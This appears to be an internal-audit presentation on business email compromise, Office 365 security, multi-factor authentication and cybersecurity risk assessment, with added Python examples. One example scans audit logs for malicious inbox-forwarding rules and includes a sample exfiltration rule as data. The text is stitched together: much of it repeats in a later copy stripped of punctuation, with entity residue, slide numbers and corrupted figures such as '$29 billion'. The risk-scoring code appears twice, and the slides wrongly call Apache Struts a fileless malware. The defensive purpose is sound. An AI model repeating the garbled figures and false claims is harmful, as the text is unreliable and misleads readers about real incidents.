Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
[Image: sample external-sender warning banners]
This “band-aid” is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft’s cloud-based suite, offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook the traditional Office products in the 4th quarter of 2017 as the larger revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging (for example, audit logging that is never enabled or never reviewed)
• There has been a significant increase in attack vectors against Office 365
• It only takes one employee’s credentials and the attacker is inside your email and Office 365 tenant
• Some attack vectors do not require a phishing email
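One concrete thing an auditor can ask IT to show is that mail-forwarding and inbox-rule changes are being watched, because that is how a BEC intruder keeps reading and diverting a victim's mail after the password is reset. The Python below is an added example (not from the presentation or from Microsoft) that scans audit records for the changes typical of an account takeover: forwarding to an external domain, or rules that delete matching mail so the victim never sees the conversation (the deleted-email symptom described on the cash-receipts slide that follows). The record layout and the sample entries are constructed to resemble, loosely, the shape of Exchange Online mailbox audit entries; the company's own domain list is an assumption.

```python
from typing import Dict, List

# Assumption: the company's own email domains; anything else is "external".
INTERNAL_DOMAINS = {"example.com"}

# Parameters that cause mail to leave the mailbox. Names follow the Exchange
# cmdlet parameters an attacker sets (New-InboxRule / Set-Mailbox).
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress"}
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}

# Constructed sample records, loosely modeled on the shape of Exchange Online
# mailbox audit entries. Addresses and IPs are documentation/test values.
SAMPLE_RECORDS = [
    {"CreationTime": "2019-02-12T08:14:02", "Operation": "New-InboxRule",
     "UserId": "treasurer@example.com", "ClientIP": "203.0.113.45",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectContainsWords", "Value": "invoice;wire;payment"},
                    {"Name": "ForwardTo", "Value": "ap.team@example.net"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2019-02-12T09:02:11", "Operation": "New-InboxRule",
     "UserId": "bob@example.com", "ClientIP": "198.51.100.7",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "MoveToFolder", "Value": "Reading"}]},
    {"CreationTime": "2019-02-12T09:30:00", "Operation": "Set-Mailbox",
     "UserId": "cfo@example.com", "ClientIP": "203.0.113.45",
     "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:cfo.backup@example.net"}]},
    {"CreationTime": "2019-02-12T10:00:00", "Operation": "MailItemsAccessed",
     "UserId": "bob@example.com", "ClientIP": "198.51.100.7", "Parameters": []},
]

def _domain(address: str) -> str:
    address = address.strip().lower()
    if address.startswith("smtp:"):
        address = address[5:]
    return address.rsplit("@", 1)[-1]

def suspicious_rule_changes(records: List[Dict], internal_domains=INTERNAL_DOMAINS) -> List[Dict]:
    """Flag rule/forwarding changes that exfiltrate or hide mail; one alert per record."""
    alerts = []
    for rec in records:
        if rec.get("Operation") not in RULE_OPERATIONS:
            continue
        params = {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}
        reasons = []
        for name in sorted(FORWARD_PARAMS.intersection(params)):
            for address in params[name].split(";"):
                if _domain(address) not in internal_domains:
                    reasons.append(f"{name} sends mail to external address {address.strip()}")
        if params.get("DeleteMessage", "").lower() == "true":
            reasons.append("rule deletes matching mail, hiding the conversation from the mailbox owner")
        if reasons:
            alerts.append({"time": rec.get("CreationTime"), "user": rec.get("UserId"),
                           "operation": rec["Operation"], "client_ip": rec.get("ClientIP"),
                           "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in suspicious_rule_changes(SAMPLE_RECORDS):
        print(alert["time"], alert["user"], alert["operation"], alert["client_ip"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Two of the four sample records are flagged: the treasurer's rule that forwards anything mentioning invoices or wires to an outside address and then deletes it, and the mailbox-level forward on the CFO's account. The same client IP appears on both, which is the kind of correlation a SIEM rule built on this logic would surface.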
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k. In one case this review triggered follow-up communication that uncovered a change in bank information (the customer’s communication was being sent to a deleted email address)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables
Cash Disbursements
• Segregation of duties (SOD): limit access to the vendor master file
• Controls related to changing bank information for any vendor: require more than email communication, and verify personally with the vendor requesting the change using contact details already on file, not those in the request
• Vendor set-up: verification of the information provided
• ISNetworld vetting process for vendors; could require vetting prior to set-up as a vendor
• ACH debits: there is no reason to give debit access to an account; if it is done, dual approval and a zero-balance account (ZBA) should be used
• Multi-factor authentication
Other Processes to Consider
Treasury, Payroll, Royalties, SOX impact, Cyber insurance, Legal liabilities, Contract language
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
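Why a security key stops the phishing that a one-time code does not: the Python below is an added model (not from the presentation or from Google), with a real RFC 6238 TOTP implementation beside a deliberately simplified stand-in for a FIDO security key, which uses an HMAC where a real key uses a public-key signature. The bank and phishing origins, the secrets and the relay scenario are assumptions made for the illustration.

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP with HMAC-SHA1. The code depends only on the secret and the
    time, not on where the user types it, which is why it can be relayed."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"

def key_assertion(key_secret: bytes, challenge: bytes, origin: str) -> bytes:
    """Simplified stand-in for a FIDO security key: the response is bound to the
    web origin the browser is actually on. (A real key signs with a private key;
    an HMAC is used here so the example needs no crypto library.)"""
    return hmac.new(key_secret, challenge + b"|" + origin.encode(), hashlib.sha256).digest()

BANK_ORIGIN = "https://bank.example"          # assumed real site
PHISH_ORIGIN = "https://bank-example.net"     # assumed look-alike run by the attacker

def relay_attack_otp(user_secret: bytes, now: int) -> bool:
    """Victim types password + OTP into the phishing page; the attacker relays the
    OTP to the real site inside the same 30-second window. True = accepted."""
    code_typed_on_phish_page = totp(user_secret, now)
    code_bank_expects = totp(user_secret, now)
    return hmac.compare_digest(code_typed_on_phish_page, code_bank_expects)

def relay_attack_security_key(key_secret: bytes, challenge: bytes) -> bool:
    """Same relay against a security key: the victim's browser is on PHISH_ORIGIN,
    so that is the origin the key binds into its response, while the bank checks
    against BANK_ORIGIN. True = accepted."""
    response_from_victim = key_assertion(key_secret, challenge, PHISH_ORIGIN)
    response_bank_expects = key_assertion(key_secret, challenge, BANK_ORIGIN)
    return hmac.compare_digest(response_from_victim, response_bank_expects)

if __name__ == "__main__":
    print("OTP relayed through phishing site accepted:",
          relay_attack_otp(b"constructed-seed", 1_500_000_000))
    print("Security key response relayed accepted:   ",
          relay_attack_security_key(b"constructed-key", b"challenge-123"))
```

The point the Google figure rests on is in the last function: the user can be fooled about which site they are on, but the browser is not, and the key signs what the browser reports. The `totp` function is checked against the published RFC 6238 test vector so the comparison is with a faithful OTP, not a strawman.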
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovation in technology
• Expansion of the attack surface
• Lack of understanding of the company’s information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company’s first line of defense may fail, and integrates multiple layers of defense around a company’s information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
Areas to evaluate:
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
PEOPLE / PROCESSES / TECHNOLOGY
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks, so that information security risks can be identified, estimated and prioritized
Assessment flow: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company’s information assets:
• What value do the assets have?
  • Credit card data
  • Employee or customer records
  • Bank accounts
  • Intellectual property
  • Trade secrets
  • Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-quantitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine which critical data assets in your environment are at most risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of the controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
[Chart: MITIGATING CONTROL COUNTS, the number of in-scope risks each candidate control reduces]
How the counts were derived:
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100? (Yes/No) If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where a control reduced risk
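Steps A through D carried through on constructed data, as an added example (this is not the presentation's model or tool). The scoring formula, likelihood (1 to 10) times impact (1 to 10) times data value (1 to 10), the threshold of 100, the sample systems and the threat-to-control mapping are all assumptions; the output is the list of in-scope system/threat pairs and the per-control counts that the Mitigating Control Counts chart tallies.

```python
from collections import Counter
from typing import Dict, List, Tuple

RISK_THRESHOLD = 100   # from the slide: risks scoring over 100 are in scope

def risk_score(likelihood: int, impact: int, data_value: int) -> int:
    """Assumed semi-quantitative scale: each factor 1-10, so scores run 1-1000."""
    return likelihood * impact * data_value

# Constructed inventory: system -> data value and per-threat (likelihood, impact).
SYSTEMS = {
    "HR payroll app": {"data_value": 8,
                       "threats": {"phishing/BEC": (7, 8), "ransomware": (6, 9), "insider misuse": (3, 6)}},
    "Public website": {"data_value": 3,
                       "threats": {"SQL injection": (6, 7), "DDoS": (5, 4)}},
    "Customer DB":    {"data_value": 10,
                       "threats": {"SQL injection": (5, 9), "ransomware": (6, 9), "insider misuse": (4, 8)}},
}

# Assumed mapping from threat to candidate mitigating controls (CIS-style names).
MITIGATIONS = {
    "phishing/BEC":   ["Multi-factor authentication", "Security awareness training", "Email filtering"],
    "ransomware":     ["Patch management", "Offline backups", "Endpoint protection", "Security awareness training"],
    "SQL injection":  ["Secure coding / input validation", "Web application firewall", "Patch management"],
    "insider misuse": ["Least-privilege access review", "Logging and monitoring"],
    "DDoS":           ["DDoS protection service"],
}

def controls_analysis(systems: Dict, mitigations: Dict, threshold: int = RISK_THRESHOLD
                      ) -> Tuple[List[Tuple[str, str, int]], Counter]:
    in_scope: List[Tuple[str, str, int]] = []
    counts: Counter = Counter()
    for system, info in systems.items():
        scores = {t: risk_score(l, i, info["data_value"]) for t, (l, i) in info["threats"].items()}
        if max(scores.values()) <= threshold:
            continue                                  # step A: system as a whole is below the line
        for threat, score in scores.items():
            if score <= threshold:
                continue                              # step B: this specific threat is not
            in_scope.append((system, threat, score))
            for control in mitigations.get(threat, []):   # step C: candidate mitigations
                counts[control] += 1                  # step D: tally every risk the control reduces
    in_scope.sort(key=lambda row: row[2], reverse=True)
    return in_scope, counts

if __name__ == "__main__":
    risks, counts = controls_analysis(SYSTEMS, MITIGATIONS)
    for system, threat, score in risks:
        print(f"{score:4d}  {system:15} {threat}")
    print("\nMitigating control counts:")
    for control, n in counts.most_common():
        print(f"{n:3d}  {control}")
```

On the sample data seven system/threat pairs clear the threshold, and patch management comes out on top (it reduces four of them) with security awareness training next; the website's DDoS risk scores 60 and so contributes nothing to the counts. The ranking, not the absolute numbers, is what the roadmap discussion with IT management uses.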
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization’s cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC (Critical Security Controls) framework, which will allow management to begin tracking cybersecurity maturity
COBIT process capability levels:
5 = Optimized
4 = Predictable
3 = Established
2 = Managed
1 = Performed
(0 = Incomplete)
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 Rev. 5, Security and Privacy Controls for Information Systems and Organizations
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable’s Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don’t just think SOX
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker’s first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company’s overall cybersecurity training and awareness program
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).

CYBERSECURITY DEFENSE IN-DEPTH
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection

PEOPLE, TECHNOLOGY, PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments -> Create a Baseline / Gap Analysis -> Implement and Manage Controls -> Assess & Report -> repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Process: Identification of Assets -> Asset Locations -> Classification of Assets -> Threat Modeling -> Calculated Risk Results

STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the company's information assets
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
Example screenshot of a critical data asset risk assessment
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest-priority, most impactful controls that should be implemented first
STEP 3 - CONTROLS ANALYSIS
• The baseline gap analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
Chart: MITIGATING CONTROL COUNTS (bar chart of how many risk instances each mitigating control reduces; values not reproduced)
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes / No)? If yes, move to the next step
C) Identify the mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
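The Step 1 threat-modeling score and the Step 3 control count (A through D), worked through in Python as an added example that is not from the presentation; the scoring formula, the 1-10 criticality scale, the threat-to-control mapping and the system inventory are constructed assumptions.

```python
"""Added example (not from the presentation).

Semi-quantitative risk score per (information system, threat) pair, then the
Step 3 mitigating-control count:
  A) keep information systems whose calculated cybersecurity risk is > 100
  B) keep only the specific threats scoring > 100 on such a system
  C) look up the mitigating controls for that threat
  D) total every instance in which a control reduces a risk above threshold
Scoring formula, criticality scale, control mapping and inventory are assumed.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Tuple

RISK_THRESHOLD = 100  # "calculated cybersecurity risk > 100" on the slide


@dataclass(frozen=True)
class ThreatRating:
    threat: str
    likelihood: int  # 1 (rare) .. 5 (almost certain)
    impact: int      # 1 (negligible) .. 5 (severe)


@dataclass(frozen=True)
class InfoSystem:
    name: str
    criticality: int  # 1 .. 10 from the Step 1 asset classification (assumed scale)
    threats: Tuple[ThreatRating, ...]


# Assumed threat -> mitigating control mapping; control names are the
# defense-in-depth and audit items listed on the slides.
MITIGATING_CONTROLS = {
    "phishing / BEC": ("Security awareness training", "Multi-factor authentication"),
    "unpatched known vulnerability": ("Patch management", "Network vulnerability scanning"),
    "ransomware": ("Endpoint protection", "Patch management", "Segregated backups"),
    "privileged account misuse": ("Least-privilege access review", "Multi-factor authentication"),
}


def risk_score(system: InfoSystem, rating: ThreatRating) -> int:
    """Assumed formula: likelihood x impact x criticality (range 1..250)."""
    return rating.likelihood * rating.impact * system.criticality


def system_risk(system: InfoSystem) -> int:
    """Step A rates a system by its highest single-threat score."""
    return max(risk_score(system, r) for r in system.threats)


def mitigating_control_counts(
    systems: Iterable[InfoSystem], threshold: int = RISK_THRESHOLD
) -> Tuple[List[Tuple[str, int]], List[Tuple[str, str, int]]]:
    """Steps A-D. Returns (controls ranked by count, the (system, threat, score)
    instances above threshold that produced those counts)."""
    counts: Counter = Counter()
    above: List[Tuple[str, str, int]] = []
    for s in systems:
        if system_risk(s) <= threshold:  # A: system below threshold, skip entirely
            continue
        for r in s.threats:
            score = risk_score(s, r)
            if score <= threshold:  # B: this specific threat is not over 100
                continue
            above.append((s.name, r.threat, score))
            for control in MITIGATING_CONTROLS.get(r.threat, ()):  # C
                counts[control] += 1  # D: one instance of reduced risk
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return ranked, above


# Constructed inventory; the scores in the comments use the assumed formula.
SYSTEMS = (
    InfoSystem("ERP / vendor master", 10, (
        ThreatRating("phishing / BEC", 4, 5),                  # 200
        ThreatRating("privileged account misuse", 3, 5),       # 150
        ThreatRating("ransomware", 2, 5),                      # 100: not > 100, excluded by B
    )),
    InfoSystem("Customer claims web portal", 8, (
        ThreatRating("unpatched known vulnerability", 4, 4),   # 128
        ThreatRating("ransomware", 2, 3),                      # 48
    )),
    InfoSystem("HR records / W-2 data", 7, (
        ThreatRating("phishing / BEC", 4, 4),                  # 112
        ThreatRating("unpatched known vulnerability", 2, 3),   # 42
    )),
    InfoSystem("Marketing file share", 2, (
        ThreatRating("ransomware", 4, 3),                      # 24: whole system excluded by A
    )),
)

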